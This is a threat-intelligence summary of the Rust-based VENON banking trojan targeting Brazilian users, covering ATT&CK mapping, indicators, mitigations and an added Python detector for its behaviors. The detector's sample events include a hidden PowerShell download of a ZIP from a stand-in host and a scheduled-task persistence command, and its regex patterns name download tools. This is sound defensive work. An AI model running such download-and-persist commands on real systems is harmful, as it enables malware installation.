Full Report
Cybersecurity researchers have disclosed details of a new banking malware targeting Brazilian users that's written in Rust, marking a significant departure from other known Delphi-based malware families associated with the Latin American cybercrime ecosystem. The malware, which is designed to infect Windows systems and was first discovered last month, has been codenamed VENON by Brazilian
Analysis Summary
# Tool/Technique: VENON
## Overview
VENON is a sophisticated banking Trojan written in the Rust programming language, specifically designed to target Windows users in Brazil. It represents a significant shift in the Latin American cybercrime landscape, which has traditionally relied on Delphi-based malware. The tool is designed to monitor financial activity and deploy credential-stealing overlays to compromise accounts at 33 different financial institutions and digital asset platforms.
## Technical Details
- **Type:** Malware family (Banking Trojan / RAT)
- **Platform:** Windows
- **Capabilities:** Credential theft via overlays, LNK hijacking, browser monitoring, and advanced evasion.
- **First Seen:** February 2026 (variants dating back to January 2026)
## MITRE ATT&CK Mapping
- **[TA0002 - Execution]**
  - [T1204.002 - User Execution: Malicious File] (Infection via ZIP/PowerShell)
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
  - [T1053.005 - Scheduled Task/Job: Scheduled Task]
- **[TA0005 - Defense Evasion]**
  - [T1574.002 - Hijacking Execution Flow: DLL Side-Loading]
  - [T1106 - Native API] (Indirect syscalls)
  - [T1562.001 - Impair Defenses: Disable or Modify Tools] (AMSI and ETW bypass)
  - [T1497 - Virtualization/Sandbox Evasion]
- **[TA0003 - Persistence]**
  - [T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification]
- **[TA0009 - Collection]**
  - [T1185 - Browser Session Hijacking] (Overlay injections)
## Functionality
### Core Capabilities
- **Banking Overlays:** Serves fake visual layers over legitimate banking websites/applications to capture credentials.
- **Active Window Monitoring:** Tracks the titles of active windows and browser domains to trigger overlays when one of 33 targeted banks is accessed.
- **LNK Hijacking:** Utilizes VBScript to replace legitimate application shortcuts (specifically targeting the Itaú bank app) with malicious versions.
- **C2 Communication:** Establishes a WebSocket connection for real-time command and control.
### Advanced Features
- **Sophisticated Evasion:** Implements nine distinct evasion techniques, including indirect syscalls (to bypass EDR hooks), Event Tracing for Windows (ETW) bypass, and Antimalware Scan Interface (AMSI) bypass.
- **Remote Restoration:** Includes an uninstall routine that restores original shortcuts, allowing the attacker to remove traces of infection remotely.
- **Cloud-Based Config:** Retrieves initial configuration files from Google Cloud Storage to stay flexible.
## Indicators of Compromise
- **File Hashes:** [Not specifically listed in article text; refer to ZenoX report]
- **File Names:** Frequently distributed in ZIP archives; uses malicious DLLs for side-loading.
- **Registry Keys:** Used for Scheduled Tasks persistence.
- **Network Indicators:**
  - `hxxps://storage[.]googleapis[.]com/[redacted]` (Config retrieval)
  - WebSocket C2 connections (specific domains not provided in text).
- **Behavioral Indicators:**
  - PowerShell execution leading to ZIP downloads.
  - Modification of `.LNK` files in user directories.
  - Execution of VBScript blocks for shortcut manipulation.
## Associated Threat Actors
- **Unknown:** No specific attribution to documented groups, though the developer uses the username **"byst4"** in their environment paths.
## Detection Methods
- **Signature-based detection:** Scanning for the Rust-based VENON binary and associated VBScript modules.
- **Behavioral detection:**
  - Monitoring for DLL side-loading events in common system processes.
  - Monitoring for unauthorized modifications to `.LNK` files.
  - Detecting common bypass techniques like AMSI/ETW patching in memory.
- **YARA rules:** Should focus on the specific Rust implementation of Latin American banking logic and the VBScript LNK hijacking strings.
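The behavioral indicators and detection methods above translate directly into endpoint-telemetry rules. The following is an added example (not code from the article or from the ZenoX report) that scores a stream of process-create and file-create events for four of the behaviors listed: a script host spawned by a browser or Office application (the ClickFix entry point), PowerShell fetching a ZIP archive, a `.LNK` file under a user profile written by a script host, and a scheduled task created from a script host. The event dictionaries, field names, sample telemetry, rule names and allowlists are all constructed for this example; the fields loosely follow Sysmon Event ID 1 and 11 and should be mapped to whatever your pipeline emits.

```python
"""Behavioral detection for the VENON-style indicators in the summary above.

Added example; event shape, sample events, rule names and allowlists are
assumptions for illustration, not fields or rules from the original report.
"""
import re
from typing import Iterable

# Script hosts the report ties to the infection chain (PowerShell, VBScript).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Browsers and Office apps that should not be spawning script hosts (ASR-style rule).
USER_APP_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "winword.exe",
                    "excel.exe", "outlook.exe"}
# Processes that legitimately create shortcuts under a user profile (assumed allowlist).
LNK_WRITER_ALLOWLIST = {"explorer.exe", "msiexec.exe"}
# Any .lnk anywhere under C:\Users\<name>\ (desktop, Start Menu, taskbar pins).
USER_LNK_RE = re.compile(r"^c:\\users\\[^\\]+\\.+\.lnk$", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
                         r"\bcurl\b|\bwget\b|start-bitstransfer)", re.IGNORECASE)
ZIP_RE = re.compile(r"\.zip\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def alert(rule: str, severity: str, ev: dict) -> dict:
    """Build a flat alert record from the event that triggered a rule."""
    return {"rule": rule, "severity": severity, "image": ev.get("image", ""),
            "detail": ev.get("target_file") or ev.get("command_line", "")}


def detect(events: Iterable[dict]) -> list:
    """Return one alert per matched rule, in event order."""
    alerts = []
    for ev in events:
        image = basename(ev.get("image", ""))
        if ev.get("type") == "process_create":
            parent = basename(ev.get("parent_image", ""))
            cmd = ev.get("command_line", "")
            # ClickFix-style initial access: user-facing app launches a script host.
            if image in SCRIPT_HOSTS and parent in USER_APP_PARENTS:
                alerts.append(alert("script_host_from_user_app", "high", ev))
            # "PowerShell execution leading to ZIP downloads".
            if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_RE.search(cmd) \
                    and ZIP_RE.search(cmd):
                alerts.append(alert("powershell_zip_download", "high", ev))
            # Scheduled-task persistence set up from a script host.
            if image == "schtasks.exe" and "/create" in cmd.lower() and parent in SCRIPT_HOSTS:
                alerts.append(alert("scheduled_task_from_script_host", "high", ev))
        elif ev.get("type") == "file_create":
            target = ev.get("target_file", "")
            if not USER_LNK_RE.match(target):
                continue
            # Shortcut replaced by VBScript/PowerShell: the LNK-hijack indicator.
            if image in SCRIPT_HOSTS:
                alerts.append(alert("lnk_written_by_script_host", "high", ev))
            # Broader net: a side-loaded host writing the .lnk directly is also unusual.
            elif image not in LNK_WRITER_ALLOWLIST:
                alerts.append(alert("lnk_written_by_unexpected_process", "medium", ev))
    return alerts


# Constructed sample telemetry: one benign event followed by three suspicious ones.
SAMPLE_EVENTS = [
    {"type": "file_create", "image": r"C:\Windows\explorer.exe",
     "target_file": r"C:\Users\alice\Desktop\Notes.lnk"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "powershell -w hidden -c \"Invoke-WebRequest http://example.invalid/"
                     "update.zip -OutFile C:\\Users\\alice\\AppData\\Local\\Temp\\update.zip\""},
    {"type": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target_file": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bank.lnk"},
    {"type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "schtasks /Create /SC ONLOGON /TN Updater /TR C:\\Users\\alice\\AppData\\Local\\upd.exe"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['rule']}: {a['image']} -> {a['detail']}")
```

The `.LNK` rule is tiered on purpose: a script host writing a shortcut under a user profile is the report's own indicator and scores high, while any other non-allowlisted writer scores medium, because the Rust payload runs inside a side-loaded host process and could rewrite the shortcut without going through `wscript.exe`. Expect to tune `LNK_WRITER_ALLOWLIST` against installers and software-deployment agents in your environment before alerting on the medium tier.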
## Mitigation Strategies
- **Prevention measures:** Block execution of unsigned scripts (PowerShell/VBScript) via policy.
- **Hardening recommendations:** Implement Attack Surface Reduction (ASR) rules to prevent office applications or browsers from spawning child processes like PowerShell.
- **Email Security:** Train users to identify "ClickFix" social engineering tactics that prompt for manual script execution.
## Related Tools/Techniques
- **Grandoreiro / Mekotio / Coyote:** Share similar banking overlay and monitoring logic.
- **ClickFix:** The social engineering framework used for initial access.
- **SORVEPOTEL:** A WhatsApp-based worm used in similar regional campaigns to deliver banking malware like Astaroth.